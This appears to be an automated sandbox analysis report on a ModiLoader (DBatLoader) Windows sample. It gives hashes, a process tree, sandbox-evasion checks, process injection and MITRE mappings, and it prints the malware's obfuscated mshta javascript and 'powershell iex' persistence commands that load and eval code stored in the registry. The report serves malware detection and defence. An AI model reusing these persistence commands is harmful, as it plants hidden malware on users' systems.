Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
submitted: 07-05-2024 03:16
Static task: static1
Behavioral task: behavioral1
Sample: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
Resource: win7-20240221-en
Behavioral task: behavioral2
Sample: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
Resource: win10v2004-20240419-en
General
Target: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
Size: 320KB
MD5: 1f4493c6c315bbc9277f1ad5e1e1953d
SHA1: e93c1fb21763138995b2a1d79c89924b0c829e23
SHA256: 3fc6e9efa5bb4b7feb57f13f51bd5cd016e502e8947cc2f27abeb7ab2df31ce8
SHA512: 1e19e47e826156b3f620c1fe879a1e9b51b9a6cab2e91862318094c8e7f498a8eaf9011f1490f7eda437073fe2d78ab70799dd03437e780c3247e95ff17e40bd
SSDEEP: 6144:onhimZQWM3Ac7zfW2geZToVBkjM+jcBCvvU83FLOaTfVTjwo6:ohimZEQcX+2g0ToVBIcIvvU8dPG
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid: 2512, pid_target: 2716, process: mshta.exe)
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exe
Key opened: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions (process: regsvr32.exe)
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exe
File opened (read-only): C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys (process: regsvr32.exe)
ModiLoader Second Stage 53 IoCs
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exe
Key opened: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools (process: regsvr32.exe)
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exe
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: regsvr32.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (process: regsvr32.exe)
Deletes itself 1 IoCs
Processes:
regsvr32.exe (pid: 1784)
Drops startup file 1 IoCs
Processes:
regsvr32.exe
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk (process: regsvr32.exe)
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
regsvr32.exe
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:F8g7dgf=\"l2frMW06\";b2S0=new%20ActiveXObject(\"WScript.Shell\");dODq1wOm3=\"5BC\";LIQ0x=b2S0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\jvvo\\\\xbawnqo\");rb0UU=\"dFNFlkRB\";eval(LIQ0x);Ua5VyHA=\"0g8\";" (process: regsvr32.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:fXX3eIK=\"I5\";yY6=new%20ActiveXObject(\"WScript.Shell\");csD9i5G=\"LTg\";VpcC76=yY6.RegRead(\"HKCU\\\\software\\\\jvvo\\\\xbawnqo\");nBx7e=\"PlwOntx4\";eval(VpcC76);U7TstC7=\"T13cL7M\";" (process: regsvr32.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\529d1c\\1bcd8a.lnk\"" (process: regsvr32.exe)
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exe
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum (process: regsvr32.exe)
Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 (process: regsvr32.exe)
Drops file in System32 directory 1 IoCs
Processes:
powershell.exe
File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (process: powershell.exe)
Suspicious use of SetThreadContext 3 IoCs
Processes:
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe, powershell.exe, regsvr32.exe
PID 1912 set thread context of 2216 (pid: 1912, process: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe, target process: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe)
PID 1940 set thread context of 1784 (pid: 1940, process: powershell.exe, target process: regsvr32.exe)
PID 1784 set thread context of 2100 (pid: 1784, process: regsvr32.exe, target process: regsvr32.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exe, regsvr32.exe
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main (process: mshta.exe)
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl (process: regsvr32.exe)
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\International (process: regsvr32.exe)
Modifies registry class 7 IoCs
Processes:
regsvr32.exe
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open (process: regsvr32.exe)
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open\command (process: regsvr32.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:fAXhYKo89=\"m14k4yIE\";WK9=new ActiveXObject(\"WScript.Shell\");GpM3dv=\"v\";hlAU67=WK9.RegRead(\"HKCU\\\\software\\\\jvvo\\\\xbawnqo\");QBk5Yg0HH=\"V9\";eval(hlAU67);jh0wA8j=\"lft\";\"" (process: regsvr32.exe)
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.cbe78f1 (process: regsvr32.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.cbe78f1\ = "ed42e7" (process: regsvr32.exe)
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7 (process: regsvr32.exe)
Key created: \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell (process: regsvr32.exe)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe (pid: 1940)
regsvr32.exe (pid: 1784)
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exe (pid: 1940)
regsvr32.exe (pid: 1784)
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exe
Token: SeDebugPrivilege (pid: 1940, process: powershell.exe)
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe, mshta.exe, powershell.exe, regsvr32.exe
PID 1912 wrote to memory of 2216 (pid: 1912, process: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe, target process: 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe)
PID 2512 wrote to memory of 1940 (pid: 2512, process: mshta.exe, target process: powershell.exe)
PID 1940 wrote to memory of 1784 (pid: 1940, process: powershell.exe, target process: regsvr32.exe)
PID 1784 wrote to memory of 2100 (pid: 1784, process: regsvr32.exe, target process: regsvr32.exe)
Processes
C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe"
  PID: 1912
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
    PID: 2216
C:\Windows\system32\mshta.exe
  Command line: "C:\Windows\system32\mshta.exe" javascript:m3Tbh3="dMpnk5";F01H=new%20ActiveXObject("WScript.Shell");osq8xQ="GpdZ9S";RTV9I1=F01H.RegRead("HKLM\\software\\Wow6432Node\\EiMXRDav\\ZBIAdIM");VrqWeeg9="IRtj";eval(RTV9I1);gFDMNu9="dSSu";
  PID: 2512
  - Process spawned unexpected child process
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xpcpm
    PID: 1940
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\regsvr32.exe
      Command line: regsvr32.exe
      PID: 1784
      - Looks for VirtualBox Guest Additions in registry
      - Looks for VirtualBox drivers on disk
      - Looks for VMWare Tools registry key
      - Checks BIOS information in registry
      - Deletes itself
      - Drops startup file
      - Adds Run key to start application
      - Maps connected drives based on registry
      - Suspicious use of SetThreadContext
      - Modifies Internet Explorer settings
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\regsvr32.exe
        Command line: "C:\Windows\SysWOW64\regsvr32.exe"
        PID: 2100
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution (1)
Registry Run Keys / Startup Folder (1)
Downloads